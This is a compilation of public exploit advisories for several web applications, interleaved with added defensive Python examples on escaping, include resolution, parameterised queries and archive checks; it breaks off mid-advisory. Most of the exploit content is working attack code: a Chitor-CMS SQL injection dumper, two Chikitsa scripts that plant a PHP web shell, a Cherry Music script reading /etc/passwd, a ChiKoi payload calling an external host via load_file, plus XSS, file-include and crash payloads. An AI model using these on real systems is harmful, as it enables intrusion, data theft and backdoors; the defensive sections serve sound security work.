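Every PoC above (the TF_submask, TF_hostname, TF_servicename, TF_port and username parameters in the multi-XSS advisory, the 404 reflection, and the TF_submask case in this CVE-2020-8839 advisory) has the same root cause: a stored or reflected value is written into HTML without context-aware escaping. The code below is an added example, not CHIYU firmware code: it shows the vulnerable rendering beside the escaped form for attribute and text context, and a small log-review helper that decodes a request's query string and reports parameters carrying tag-breaking characters. The PoC 01 request line is used as the constructed sample.

```python
import html
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the request path from PoC 01 above, as the CGI receives it.
POC01_REQUEST_PATH = ("/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443"
                      "&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
                      "&radio_ping_block=0&max_tcp=3&B_apply=APPLY")

# Characters that end an attribute value or open a tag when copied into HTML raw.
BREAKOUT_CHARS = '<>"\''


def render_input_vulnerable(name: str, value: str) -> str:
    """Mirror of the flaw: a stored setting is written straight into an
    attribute value, so a value starting with '">' closes the tag and the
    remainder is parsed as markup."""
    return f'<input name="{name}" value="{value}">'


def render_input_safe(name: str, value: str) -> str:
    """Hardened: escape for attribute context; quote=True also encodes the
    double and single quotes that would otherwise end the attribute."""
    return f'<input name="{name}" value="{html.escape(value, quote=True)}">'


def render_not_found_safe(path: str) -> str:
    """Same rule in text context: the 404 page reflecting the requested URL."""
    return f"<p>Page not found: {html.escape(path)}</p>"


def suspicious_params(request_path: str) -> List[Tuple[str, str]]:
    """Log-review helper: decode every query parameter and report those whose
    decoded value contains characters that break out of HTML context.
    Operational values such as subnet masks and host names never need them."""
    query = urlsplit(request_path).query
    return [(key, value) for key, value in parse_qsl(query, keep_blank_values=True)
            if any(c in value for c in BREAKOUT_CHARS)]


if __name__ == "__main__":
    for key, value in suspicious_params(POC01_REQUEST_PATH):
        print(f"{key}: vulnerable -> {render_input_vulnerable(key, value)}")
        print(f"{key}: escaped    -> {render_input_safe(key, value)}")
```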
#!/usr/bin/python3
#######################################################
# #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
# Date: 2023/04/13 #
# ExploitAuthor: msd0pe #
# Project: https://github.com/waqaskanju/Chitor-CMS #
# My Github: https://github.com/msd0pe-1 #
# Patched the 2023/04/16: 69d3442 commit #
# #
#######################################################
__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'
import re
import requests
import optparse
from prettytable import PrettyTable


class bcolors:
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    OCRA = '\033[93m'
    RED = '\033[91m'
    CYAN = '\033[96m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class infos:
    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "


def DumpTable(url, database, table):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    columns = []
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq", u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                columns.append(i)
            pass
    except:
        pass
    x.field_names = columns
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[", "").replace("]", "").replace("\'", "").replace(" ", "") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq", u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                x.add_rows([i])
    except ValueError:
        r = re.findall("qpzkq\[(.*?)\]qjkbq", u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                i.append("")
                x.add_rows([i])
    print(x)


def ListTables(url, database):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["TABLES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq", u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def ListDatabases(url):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["DATABASES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq", u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def Main():
    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
    (options, args) = Menu.parse_args()
    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
    Menu.add_option_group(Examples)
    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
        Menu.print_help()
        print('')
        print(' %s' % __description__)
        print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
        print(' Any malicious or illegal activity may be punishable by law')
        print(' Use at your own risk')
    elif len(args) == 0:
        try:
            if options.url != None:
                if options.l_databases != None:
                    ListDatabases(options.url)
                if options.database != None:
                    if options.l_tables != None:
                        ListTables(options.url, options.database)
                    if options.table != None:
                        if options.dump != None:
                            DumpTable(options.url, options.database, options.table)
        except:
            print("Unexpected error")


if __name__ == '__main__':
    try:
        Main()
    except KeyboardInterrupt:
        print()
        print(infos.PROCESS + "Exiting...")
        print()
        exit(1)
source: https://www.securityfocus.com/bid/47395/info
chillyCMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
chillyCMS 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/core/helpers.include.php?file=[Ev!l-Sh3ll]
http://www.example.com/[path]/core/helpers.include.php?path=[Ev!l-Sh3ll]
http://www.example.com/[path]/core/helpers.include.php?fullpath=[Ev!l-Sh3ll]
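The three parameters above (`file`, `path`, `fullpath`) reach an include without any check on where the name points. An added example of the resolver a fixed version needs, written in Python rather than PHP so it can be exercised offline and not taken from chillyCMS itself: it refuses URLs and stream wrappers (remote includes), absolute paths, NUL bytes and anything that normalises to outside the include directory, and finally requires the file to be one the application actually knows. The include root and the set of known files are assumptions for the example.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed layout for the example: included helpers live under this directory.
INCLUDE_ROOT = "/var/www/chillycms/core/includes"
# Assumed allowlist: the only helper files the application knows how to load.
KNOWN_INCLUDES = {"helpers.php", "db.php", "template.php"}


def resolve_include(name: str, root: str = INCLUDE_ROOT) -> str:
    """Hardened resolver for a user-supplied include name.

    Order matters: reject remote and absolute forms first, then normalise and
    prove containment in the root, then check the allowlist. The allowlist
    alone would already be enough; the containment check keeps the function
    safe if someone later loosens the allowlist to a directory listing.
    """
    if not name or "\x00" in name:
        raise ValueError("empty or NUL-containing include name")
    if urlsplit(name).scheme or name.startswith(("//", "\\\\")):
        raise ValueError("remote include or stream wrapper rejected")
    if posixpath.isabs(name) or "\\" in name:
        raise ValueError("absolute path rejected")
    full = posixpath.normpath(posixpath.join(root, name))
    if posixpath.commonpath([root, full]) != root:
        raise ValueError("path escapes include root")
    if posixpath.relpath(full, root) not in KNOWN_INCLUDES:
        raise ValueError("not a known include")
    return full


def include_accepted(name: str) -> bool:
    """Convenience wrapper for tests and log review: would this value be loaded?"""
    try:
        resolve_include(name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for candidate in ["helpers.php", "./db.php", "../../config.php",
                      "http://example.com/shell.txt", "php://input", "/etc/passwd"]:
        print(f"{candidate!r}: {'accepted' if include_accepted(candidate) else 'rejected'}")
```

In PHP itself the equivalent belt-and-braces setting is `allow_url_include=Off` (it is off by default in current releases), but that only removes the remote form; the local traversal form still needs the resolver.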
# # # # #
# Exploit Title: Child Care Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/child-care-script/
# Demo: http://ordermanagementscript.com/demo/childcare/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/list?city=[SQL]&main_search=
#
# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
#
# # # # #
## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi
## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION
SELECT 6994) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```
[+] Online:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION
SELECT 6426) END))-- -
---
```
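The Chitor-CMS `edit_school.php?id=`, Child Care Script `list?city=` and ChiKoi `User-Agent` findings above are the same bug in three places: request data is concatenated into SQL text. As an added example that belongs to none of those projects, the block below reproduces the vulnerable lookup and its parameterised replacement against an in-memory SQLite database (a constructed schema standing in for the CMS tables; the `login` table name comes from the Chitor script's usage examples). The UNION behaviour is the same on MySQL: once a quote ends the string literal, a UNION with a matching column count appends rows from any other table to the result. Request headers are handled the same way, since the ChiKoi case shows they are attacker-controlled input like any parameter.

```python
import sqlite3
from typing import List, Tuple

# Constructed schema standing in for the CMS tables referred to above; sqlite3
# is used so the example runs offline.
SCHEMA = """
CREATE TABLE school(id INTEGER PRIMARY KEY, name TEXT, city TEXT);
CREATE TABLE login(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
CREATE TABLE visit_log(id INTEGER PRIMARY KEY, user_agent TEXT);
INSERT INTO school VALUES (1, 'Example School', 'Lisbon');
INSERT INTO login VALUES (1, 'admin', 'constructed-hash-value');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_school_vulnerable(conn: sqlite3.Connection, school_id: str) -> List[Tuple]:
    """Mirror of the flaw: the id parameter is pasted into the SQL text, so a
    quote ends the literal and the rest of the value is parsed as SQL."""
    sql = f"SELECT id, name, city FROM school WHERE id='{school_id}'"
    return conn.execute(sql).fetchall()


def get_school_safe(conn: sqlite3.Connection, school_id: str) -> List[Tuple]:
    """Hardened: validate the type, then bind the value as a parameter so the
    driver never interprets it as SQL."""
    if not school_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, name, city FROM school WHERE id=?",
                        (int(school_id),)).fetchall()


def school_lookup_accepted(conn: sqlite3.Connection, school_id: str) -> bool:
    try:
        get_school_safe(conn, school_id)
        return True
    except ValueError:
        return False


def log_visit_safe(conn: sqlite3.Connection, user_agent: str) -> str:
    """Headers are untrusted input too: the User-Agent value is bound, never
    concatenated, so quotes inside it are stored literally and harmlessly."""
    conn.execute("INSERT INTO visit_log(user_agent) VALUES (?)", (user_agent,))
    conn.commit()
    return conn.execute("SELECT user_agent FROM visit_log ORDER BY id DESC LIMIT 1").fetchone()[0]


if __name__ == "__main__":
    conn = make_db()
    crafted = "-1' UNION SELECT id, username, password_hash FROM login-- "
    print("vulnerable:", get_school_vulnerable(conn, crafted))
    print("hardened accepts crafted id:", school_lookup_accepted(conn, crafted))
    print("stored UA:", log_visit_safe(conn, "Mozilla/5.0' WHERE 1=1-- -"))
```

The `JSON_ARRAYAGG`/`CONCAT_WS` markers in the Chitor script and the `FLOOR(RAND(0)*2)` error-based form in the sqlmap output are just more elaborate ways of reading back the same appended rows; none of them survives a bound parameter, which is why the fix is parameterisation rather than filtering keywords.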
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)
## Proof and Exploit:
[href](https://streamable.com/7x69yz)
## Time spent
`01:30:00`
## Writing an exploit
`00:05:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
# Version: 2.0.2
# Tested on: Ubuntu
import requests
import os
import argparse


def login(session, target, username, password):
    print("[+] Attempting to login with the credential")
    url = target + "/index.php/login/valid_signin"
    login_data = {"username": username, "password": password}
    session.post(url, data=login_data, verify=False)
    return session


def generate_plugin():
    print("[+] Generating a malicious plugin")
    global tmp_dir
    tmp_dir = os.popen("mktemp -d").read().rstrip()
    open(f"{tmp_dir}/rce.php", "w").write("<?php system($_REQUEST['cmd']);?>")
    os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()


def upload_plugin(session, target):
    print("[+] Uploading the plugin into the server.")
    url = target + "/index.php/module/upload_module/"
    file = open(f"{tmp_dir}/rce.zip", "rb").read()
    session.post(url, verify=False, files={"extension": ("rce.zip", file)})
    session.get(target + "/index.php/module/activate_module/rce", verify=False)
    print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")
    print(f"[+] Example Output : {requests.get(target + '/application/modules/rce.php?cmd=id', verify=False).text}")


def main():
    parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ \/ / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
\___/_/ /_/_/_/|_/_/\__/____/\__,_/
Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution :
POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""", formatter_class=argparse.RawTextHelpFormatter)
    req_args = parser.add_argument_group('required arguments')
    req_args.add_argument("URL", help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
    req_args.add_argument("-u", "--username", help="Username", required=True)
    req_args.add_argument("-p", "--password", help="password", required=True)
    args = parser.parse_args()
    target = args.URL
    if target[-1] == "/":
        target = target[:-1]
    username = args.username
    password = args.password
    session = requests.session()
    login(session, target, username, password)
    generate_plugin()
    upload_plugin(session, target)


if __name__ == "__main__":
    main()
# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
# Version: 2.0.2
# Tested on: Ubuntu
import requests
import os
from zipfile import ZipFile
import argparse

def login(session, target, username, password):
    print("[+] Attempting to login with the credential")
    url = target + "/index.php/login/valid_signin"
    login_data = {"username": username, "password": password}
    session.post(url, data=login_data, verify=False)
    return session

def download_backup(session, target):
    print("[+] Downloading the backup (This may take some time)")
    url = target + "/index.php/settings/take_backup/"
    backup_req = session.get(url, verify=False)
    global tmp_dir
    tmp_dir = os.popen("mktemp -d").read().rstrip()
    open(tmp_dir + "/backup_raw.zip", "wb").write(backup_req.content)
    print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")

def modify_backup():
    print("[+] Modifying the backup by injecting a backdoor.")
    zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')
    zf.extractall(tmp_dir)
    zf.close()
    open(tmp_dir + "/uploads/media/rce.php", "w").write("<?php system($_REQUEST['cmd']);?>")
    os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()

def upload_backup(session, target):
    print("[+] Uploading the backup back into the server.(This may take some time)")
    url = target + "/index.php/settings/restore_backup"
    file = open(f"{tmp_dir}/backup_modified.zip", "rb").read()
    session.post(url, verify=False, files={"backup": ("backup-modified.zip", file)})
    print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
    print(f"[+] Example Output : {requests.get(target + '/uploads/restore_backup/uploads/media/rce.php?cmd=id', verify=False).text}")

def main():
    parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ \/ / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
\___/_/ /_/_/_/|_/_/\__/____/\__,_/
Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution :
POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""", formatter_class=argparse.RawTextHelpFormatter)
    req_args = parser.add_argument_group('required arguments')
    req_args.add_argument("URL", help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
    req_args.add_argument("-u", "--username", help="Username", required=True)
    req_args.add_argument("-p", "--password", help="password", required=True)
    args = parser.parse_args()
    target = args.URL
    if target[-1] == "/":
        target = target[:-1]
    username = args.username
    password = args.password
    session = requests.session()
    login(session, target, username, password)
    download_backup(session, target)
    modify_backup()
    upload_backup(session, target)

if __name__ == "__main__":
    main()
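Both Chikitsa scripts above rely on the server accepting an archive (a plugin zip, or a restored backup zip) that carries a .php file and writing its members straight into the web root. The example below is added here and is not Chikitsa's code; it shows the server-side gatekeeping such an endpoint needs: inspect every member name for executable extensions, absolute paths and ".." traversal before extraction, then re-check each resolved target during extraction. The function names, the extension list and the in-memory sample archives are this example's own.

```python
"""Gatekeeping for archives uploaded as plugins or restored as backups.
Added example, not Chikitsa's code; names and samples are this example's own."""
import io
import os
import posixpath
import tempfile
import zipfile
from typing import Dict, List

# Extensions the web server would execute if they landed under the document root.
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php3", ".php5", ".phar", ".cgi", ".pl", ".py", ".sh"}

def entry_problems(name: str) -> List[str]:
    """Reasons an archive member name is unacceptable; an empty list means it is fine."""
    problems = []
    normalized = name.replace("\\", "/")
    if normalized.startswith("/") or normalized[1:2] == ":":
        problems.append("absolute path")
    if ".." in normalized.split("/"):
        problems.append("parent-directory traversal")
    if "\x00" in normalized:
        problems.append("NUL byte in name")
    ext = posixpath.splitext(normalized)[1].lower()
    if ext in EXECUTABLE_EXTENSIONS:
        problems.append(f"executable extension {ext}")
    return problems

def inspect_archive(data: bytes) -> Dict[str, List[str]]:
    """Map each offending member to its problems; {} means the archive passed."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            problems = entry_problems(info.filename)
            if problems:
                findings[info.filename] = problems
    return findings

def safe_extract(data: bytes, dest: str) -> List[str]:
    """Refuse the whole archive if any member fails inspection, then extract while
    re-checking that every resolved target stays under dest."""
    findings = inspect_archive(data)
    if findings:
        raise ValueError(f"archive rejected: {findings}")
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"member escapes destination: {info.filename}")
            zf.extract(info, dest_real)
            written.append(info.filename)
    return sorted(written)

def extract_to_tempdir(data: bytes) -> List[str]:
    """Demo wrapper: extract into a fresh temporary directory and list what was written."""
    return safe_extract(data, tempfile.mkdtemp(prefix="restore-"))

def build_archive(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip from a name->content map (used only for the constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed samples shaped like the uploads in the two advisories above.
MALICIOUS_PLUGIN = build_archive({"rce.php": b"<?php /* placeholder, never executed here */ ?>"})
MALICIOUS_BACKUP = build_archive({
    "chikitsa-backup.sql": b"-- constructed dump",
    "prefix.txt": b"ck_",
    "uploads/media/rce.php": b"<?php /* placeholder */ ?>",
})
TRAVERSAL_BACKUP = build_archive({"../../config.php": b"<?php ?>"})
CLEAN_BACKUP = build_archive({
    "chikitsa-backup.sql": b"-- constructed dump",
    "prefix.txt": b"ck_",
    "uploads/media/logo.png": b"\x89PNG\r\n\x1a\n",
})

if __name__ == "__main__":
    for label, blob in [("plugin", MALICIOUS_PLUGIN), ("backup", MALICIOUS_BACKUP),
                        ("traversal", TRAVERSAL_BACKUP), ("clean", CLEAN_BACKUP)]:
        print(f"{label:10} {inspect_archive(blob) or 'OK'}")
    print("extracted:", extract_to_tempdir(CLEAN_BACKUP))
```

Rejecting the whole archive rather than skipping bad members is deliberate: a backup that has been tampered with should not be partially restored. The extension list is a denylist of what the server interprets; an allowlist of expected member names (for a backup, the SQL dump, prefix file and media directory) is stricter where the format is fixed.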
# Exploit Title: Chevereto 3.17.1 - Cross Site Scripting (Stored)
# Google Dork: "powered by chevereto"
# Date: 19.04.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://chevereto.com/
# Software Link: https://chevereto.com/releases
# Version: 3.17.1
# Tested on: Windows 10 / Xampp
Proof of Concept:
1. Press the Upload image button and upload any image.
2. After uploading the image, press the pencil icon on the top right of the image and write "><svg/onload=alert(1)> instead of the title.
3. Upload the picture and go to the picture address.
source: https://www.securityfocus.com/bid/53448/info
Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks.
Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected.
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script>
#!/usr/bin/python
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.giuspen.com/cherrytree/
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
# Version: Affects all versions of CherryTree prior to 0.37.6
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script. It will generate a "PoC-1.ctd" file.
# * Open the file and hover over the link.
# Bonus
# =====
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
# Why?
# ====
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
# trying to draw the contents of the graphical bitmaps.
# Exploit code
# ============
crashfile = '''<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
<rich_text link="node 1 ''' + "A"*65534 + '''">MOUSE OVER THIS</rich_text>
</node>
</cherrytree>
'''

with open("PoC-1.ctd", 'w') as f:
    f.write(crashfile)
    f.close()
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib

# set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)

for c in cj:
    if c.name == "session_id":
        session_id = c.value

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()

with open(downloadFileName, 'wb') as zipFile:
    zipFile.write(response)
Document Title:
===============
Chemtool 1.6.14 Memory Corruption Vulnerability
Date:
=============
08/02/2015
Vendor Homepage:
================
http://ruby.chemie.uni-freiburg.de/~martin/chemtool/
Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Chemtool 1.6.14.
Affected Product(s):
====================
